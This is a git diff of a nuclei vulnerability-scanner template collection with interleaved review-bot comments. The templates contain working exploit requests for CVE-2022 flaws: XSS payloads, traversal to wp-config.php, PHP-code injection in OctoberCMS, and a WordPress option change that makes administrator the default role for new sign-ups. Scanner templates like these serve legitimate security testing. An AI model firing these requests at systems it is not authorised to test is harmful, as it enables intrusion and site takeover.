- 'status_code_2==500' - condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0776.yaml b/nuclei-templates/CVE-2022/cve-2022-0776.yaml deleted file mode 100644 index 39746c0077..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0776.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2022-0776 - -info: - name: RevealJS postMessage <4.3.0 - Cross-Site Scripting - author: LogicalHunter - severity: high - description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. - reference: - - https://hackerone.com/reports/691977 - - https://github.com/hakimel/reveal.js/pull/3137 - - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0776 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - cve-id: CVE-2022-0776 - tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs - -headless: - - steps: - - args: - url: "{{BaseURL}}" - action: navigate - - action: waitload - - action: script - name: extract - args: - code: | - () => { - return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") - } - - matchers: - - type: word - part: extract - words: - - "true" - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-0870.yaml b/nuclei-templates/CVE-2022/cve-2022-0870.yaml new file mode 100644 index 0000000000..e97ed1ef8a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0870.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2022-0870 + +info: + name: Gogs - SSRF + author: Akincibor + severity: medium + description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. + reference: + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 + - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-0870 + cwe-id: CWE-918 + metadata: + shodan-query: http.favicon.hash:-449283196 + tags: cve,cve2022,ssrf,gogs,huntr + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: regex + group: 1 + regex: + - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + matchers-condition: and + matchers: + + - type: regex + part: body + regex: + - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: dsl + dsl: + - compare_versions(version, '< 0.12.5') + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-0921.yaml b/nuclei-templates/CVE-2022/cve-2022-0921.yaml deleted file mode 100644 index cd4e13baa8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0921.yaml +++ /dev/null 
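Review bot: The template identifies CVE-2022-0870 solely from the version string in the page footer and never exercises the SSRF, so a backported fix or a customised footer produces a false positive or false negative; `description` should say so, e.g. `description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. This template only fingerprints the version from the page footer and does not test the SSRF itself.` The same regex literal is written three times (internal extractor, public extractor, body matcher); the public extractor duplicates the already-captured `version`, and the regex matcher appears redundant because `compare_versions(version, '< 0.12.5')` can only succeed when the internal extractor matched. The `\n\s+` in the pattern also ties the match to the exact whitespace of the stock footer markup, which is worth noting as a source of misses.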
@@ -1,57 +0,0 @@ -id: CVE-2022-0954 - -info: - name: Microweber - Cross-site Scripting - author: amit-jd - severity: medium - description: | - Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. - reference: - - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 - - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ - - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0954 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,microweber - -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - POST /api/save_option HTTP/2 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}/admin/view:shop/action:options - - option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother - - - | - POST /module/ HTTP/2 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}/admin/view:shop/action:options - - module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B - - cookie-reuse: true - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2,"true")' - - contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default') - - 'contains(all_headers_3,"text/html")' - - 
'status_code_3==200' - condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0952.yaml b/nuclei-templates/CVE-2022/cve-2022-0952.yaml new file mode 100644 index 0000000000..c51d27c117 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0952.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-0952 + +info: + name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update + author: random-robbie + severity: high + description: | + The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin + reference: + - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b + - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-0952 + cwe-id: CWE-862 + metadata: + verified: "true" + tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress + +requests: + - raw: + - | + POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 + Host: {{Hostname}} + Content-type: application/json;charset=UTF-8 + + {"users_can_register":"1"} + + - | + POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 + Host: {{Hostname}} + Content-type: application/json;charset=UTF-8 + + {"default_role":"administrator"} + + - | + POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 + Host: {{Hostname}} + Content-type: application/json;charset=UTF-8 + + {"users_can_register":"0"} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(all_headers, "application/json")' + - "status_code == 200" + - "contains(body_1, 'users_can_register')" + - "contains(body_2, 'default_role')" + condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0963.yaml b/nuclei-templates/CVE-2022/cve-2022-0963.yaml new file mode 100644 index 0000000000..5a03cfe931 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0963.yaml 
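Review bot: The third request resets only `users_can_register` to `0`; `default_role` is left at `administrator`, so after a positive result every future sign-up on the scanned site becomes an administrator. Add a fourth request to the same endpoint with body `{"default_role":"subscriber"}` (WordPress's shipped default — the template cannot know the prior value) and record the residual change in a comment. Even with that reset the template overwrites whatever `users_can_register` was set to beforehand and does so on any host that accepts the endpoint, so `tags:` should include `intrusive` and `description` should state that live site options are modified.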
@@ -0,0 +1,71 @@ +id: CVE-2022-0963 + +info: + name: Microweber <1.2.12 - Stored Cross-Site Scripting + author: amit-jd + severity: medium + description: | + Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,. + reference: + - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ + - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 + - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c + - https://nvd.nist.gov/vuln/detail/CVE-2022-0963 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0963 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /plupload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034 + Referer: {{BaseURL}}admin/view:modules/load_module:files + + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="name" + + {{randstr}}.xml + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="chunk" + + 0 + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="chunks" + + 1 + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="file"; filename="blob" + Content-Type: application/octet-stream + + <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script> + -----------------------------59866212126262636974202255034-- + + - | + GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + 
matchers: + - type: dsl + dsl: + - 'contains(body_3,"alert(document.domain)")' + - 'status_code_3==200' + - 'contains(body_2,"bytes_uploaded")' + condition: and + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-1020.yaml b/nuclei-templates/CVE-2022/cve-2022-1020.yaml deleted file mode 100644 index 4293352fff..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1020.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-1020 - -info: - name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call - author: Akincibor - severity: critical - description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. - reference: - - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-1020 - cwe-id: CWE-352,CWE-862 - tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth - -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - option_key=a&perpose=update&callback=phpinfo - - matchers-condition: and - matchers: - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td><td class="v">([0-9.]+)' - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-1119.yaml b/nuclei-templates/CVE-2022/cve-2022-1119.yaml deleted file mode 100644 index 2e0ecf66e8..0000000000 
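Review bot: `Referer: {{BaseURL}}admin/view:modules/load_module:files` in the second request has no `/` between `{{BaseURL}}` and `admin`, which yields a value like `https://hostadmin/...` when BaseURL carries no trailing slash; the Microweber template for CVE-2022-0954 deleted in this same commit used `{{BaseURL}}/admin/view:shop/action:options`, so the slash form is the one to keep. The uploaded `{{randstr}}.xml` persists under `/userfiles/media/default/` after a positive match; `intrusive` is tagged, but a comment naming the artifact, e.g. `# leaves {{randstr}}.xml under /userfiles/media/default/ that must be removed after the scan`, would help operators. `description` also ends with `XML files,.` — a stray comma before the full stop.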
--- a/nuclei-templates/CVE-2022/cve-2022-1119.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-1119 - -info: - name: WordPress Simple File List <3.2.8 - Local File Inclusion - author: random-robbie - severity: high - description: | - WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. - reference: - - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e - - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 - - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1119 - cwe-id: CWE-22 - tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1221.yaml b/nuclei-templates/CVE-2022/cve-2022-1221.yaml new file mode 100644 index 0000000000..6c2b34470f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1221.yaml 
@@ -0,0 +1,45 @@ +id: CVE-2022-1221 + +info: + name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting + author: veshraj + severity: medium + description: | + Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + reference: + - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1221 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "</script><script>alert(document.domain)</script> popup-" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/12 diff --git a/nuclei-templates/CVE-2022/cve-2022-1392.yaml b/nuclei-templates/CVE-2022/cve-2022-1392.yaml deleted file mode 100644 index b75a81b595..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1392.yaml +++ /dev/null 
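Review bot: `verified: "true"` is written as a quoted string while other templates touched by this commit use the boolean form `verified: true`; one form should be chosen so tooling that reads the metadata sees a consistent type. `description` spells the product `Wordpress` while `name` uses `WordPress`. With `stop-at-first-match: true` and two paths, the single body matcher `</script><script>alert(document.domain)</script> popup-` must hold for whichever path reflects first; if the `id` parameter reflects in a different attribute context than `class`, the second path can never satisfy it, which is worth confirming against the wpscan reference.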
@@ -1,38 +0,0 @@ -id: CVE-2022-1392 - -info: - name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion - author: Veshraj - severity: high - description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. - reference: - - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - - https://packetstormsecurity.com/files/166534/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1392 - metadata: - verified: true - tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "failed to open stream: No such file or directory" - - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1439.yaml b/nuclei-templates/CVE-2022/cve-2022-1439.yaml deleted file mode 100644 index b1a66614ea..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1439.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2022-1439 - -info: - name: Microweber <1.2.15 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - reference: - - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ - - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0 - - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1439 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1439 - cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 - tags: cve,cve2022,microweber,xss,huntr - -requests: - - method: GET - path: - - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "<div class='x module module-'onmouseover=alert(document.domain) '" - - "parent-module-id" - condition: and - -# Enhanced by md on 2022/09/12 diff --git a/nuclei-templates/CVE-2022/cve-2022-1815.yaml b/nuclei-templates/CVE-2022/cve-2022-1815.yaml deleted file mode 100644 index f7a27e1593..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1815.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2022-1815 - -info: - name: Drawio < 18.1.2 - Server Side Request Forgery - author: amit-jd - severity: high - description: | - SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2. - reference: - - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 - - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f - - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1815 - cwe-id: CWE-918 - metadata: - verified: "true" - tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph - -requests: - - raw: - - | - GET /service/0/test.oast.me HTTP/2 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - "contains(body, 'Interactsh Server')" - - status_code == 200 - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-21371.yaml b/nuclei-templates/CVE-2022/cve-2022-21371.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-21371.yaml rename to nuclei-templates/CVE-2022/cve-2022-21371.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml deleted file mode 100644 index 2a4dc2ff2e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21500.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -id: CVE-2022-21500 - -info: - name: Oracle E-Business Suite <=12.2 - Authentication Bypass - author: 0xpugazh - severity: high - description: | - Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. - remediation: | - Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. - reference: - - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - - https://twitter.com/GodfatherOrwa/status/1514720677173026816 - - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 - - https://www.oracle.com/security-alerts/cpujul2022.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-21500 - epss-score: 0.29303 - epss-percentile: 0.96354 - cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: oracle - product: e-business_suite - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 - tags: cve,cve2022,oracle,misconfig,auth-bypass - -http: - - method: GET - path: - - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - 'Registration' - - 'Register as individual' - - '<!-- ibeCZzpRuntimeIncl.jsp end -->' - condition: and - - - type: status - status: - - 200 
diff --git a/nuclei-templates/CVE-2022/cve-2022-21705.yaml b/nuclei-templates/CVE-2022/cve-2022-21705.yaml deleted file mode 100644 index 1e09625694..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21705.yaml +++ /dev/null 
@@ -1,109 +0,0 @@ -id: CVE-2022-21705 - -info: - name: October CMS - Remote Code Execution - author: iPhantasmic - severity: high - description: | - October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. - remediation: | - The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. - reference: - - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-21705 - cwe-id: CWE-74 - tags: cve,cve2022,authenticated,rce,cms,octobercms,injection - -requests: - - raw: - - | # to obtain session_key and token - GET /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - - - | # to perform authentication and obtain admin cookies - POST /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} - - - | # to inject php code in Markup editor and perform exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onSave - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - 
_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 - - - | # to obtain theme - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onCreateTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&type=page - - - | # to access the template page for generated exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onOpenTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm - - cookie-reuse: true - - extractors: - - type: xpath - name: session_key - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" - internal: true - # Obtain _session_key for current OctoberCMS session - - - type: xpath - name: token - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" - internal: true - # Obtain _token for current OctoberCMS session - - - type: regex - name: theme - part: body - group: 1 - regex: - - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"' - internal: true - # Obtain current theme used for Markup editor of OctoberCMS - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'function onInit()' - - 'phpinfo()' - - 'Safe mode is currently enabled. 
Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.' - condition: and - # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22947.yaml b/nuclei-templates/CVE-2022/cve-2022-22947.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-22947.yaml rename to nuclei-templates/CVE-2022/cve-2022-22947.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-22954.yaml b/nuclei-templates/CVE-2022/cve-2022-22954.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-22954.yaml rename to nuclei-templates/CVE-2022/cve-2022-22954.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23347.yaml b/nuclei-templates/CVE-2022/cve-2022-23347.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23347.yaml rename to nuclei-templates/CVE-2022/cve-2022-23347.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-23779.yaml b/nuclei-templates/CVE-2022/cve-2022-23779.yaml new file mode 100644 index 0000000000..e42ca66955 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23779.yaml 
@@ -0,0 +1,61 @@
+id: CVE-2022-23779
+
+info:
+ name: Zoho ManageEngine - Internal Hostname Disclosure
+ author: cckuailong
+ severity: medium
+ description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
+ reference:
+ - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html
+ - https://github.com/fbusr/CVE-2022-23779
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23779
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2022-23779
+ cwe-id: CWE-200
+ metadata:
+ fofa-query: app="ZOHO-ManageEngine-Desktop"
+ tags: cve,cve2022,zoho,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/themes"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 301
+
+ - type: word
+ part: header
+ words:
+ - '/themes/'
+ - 'text/html'
+ condition: and
+
+ - type: word
+ part: location
+ words:
+ - '{{Host}}'
+ negative: true
+
+ - type: word
+ words:
+ - '<center><h1>301 Moved Permanently</h1></center>'
+
+ - type: regex
+ part: location
+ regex:
+ - 'https?:\/\/(.*):'
+
+ extractors:
+ - type: regex
+ part: location
+ group: 1
+ regex:
+ - 'https?:\/\/(.*):'
+
+# Enhanced by mp on 2022/03/28
diff --git a/nuclei-templates/CVE-2022/CVE-2022-23808.yaml b/nuclei-templates/CVE-2022/cve-2022-23808.yaml
similarity index 100%
rename from nuclei-templates/CVE-2022/CVE-2022-23808.yaml
rename to nuclei-templates/CVE-2022/cve-2022-23808.yaml
